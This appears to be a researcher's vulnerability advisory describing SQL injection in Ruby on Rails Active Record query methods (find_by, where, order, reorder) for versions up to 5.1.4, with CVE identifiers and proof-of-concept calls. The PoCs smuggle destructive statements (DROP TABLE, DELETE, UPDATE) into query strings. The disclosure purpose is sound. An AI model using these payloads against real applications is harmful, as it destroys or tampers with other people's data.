Kay

security researcher @MalwareBenchmark.

Ruby on Rails Arbitrary SQL Injection

Framwork: Ruby on Rails

Affected Version: <= 5.1.4

Published: December 27th, 2017

Reported by: Kay

Overview

Ruby on Rails is a web application development framework written in the Ruby language. Several issues were discovered in Active Record Query Interface, which may cause arbitrary SQL Injection. SQL statements can be injected into Rails appliactions with setting flags: [MULTI_STATEMENTS] in database.yml by some query methods like find_by, where, order, etc.

SQL statements, generated by these query methods when they accept string parameters, can be separated by semicolon.

It is confirmed that these vulnerabilities may affect applications built on MySQL. What’s worse, it is verified that if a Rails application built on Alibaba Cloud RDS for MySQL, an attack will also succeed without setting flags: [MULTI_STATEMENTS] in Rails application.

To summary, it is possible if all of these conditions are true:

  1. A Rails application is built on Alibaba Cloud RDS for MySQL or it has been set flags: [MULTI_STATEMENTS] in database.yml

  2. passing string parameters to query methods like find_by, where, order, etc.

PoC

CVE-2017-17916 SQL injection in find_by method

1
2
#find an User record whose name equals Amy, and drop table users
User.find_by("name = 'Amy'); DROP TABLE `users`;(") 

xb4t1.md.png

CVE-2017-17917 SQL injection in where method

1
2
#find User records whose id equal 1, and delete them
User.where("id = 1); DELETE FROM `users` WHERE `users`.`id` = 1;(")

xH7Zj.md.png

CVE-2017-17919 SQL injection in order method

1
2
#get users ordered by id desc and update user's name to kay whose id equals 2
User.order("id desc; UPDATE `users` SET `name` = 'kay' WHERE `users`.`id` = 2")

xHIsg.md.png

CVE-2017-17920 SQL injection in reorder method

1
2
#get users ordered by id desc and update user's name to malwarebenchmark whose id equals 1
User.reorder("id desc; UPDATE `users` SET `name` = 'malwarebenchmark' WHERE `users`.`id` = 1")

xH5QS.md.png

vulnerability

« CVE-2017-15806: 远程代码执行漏洞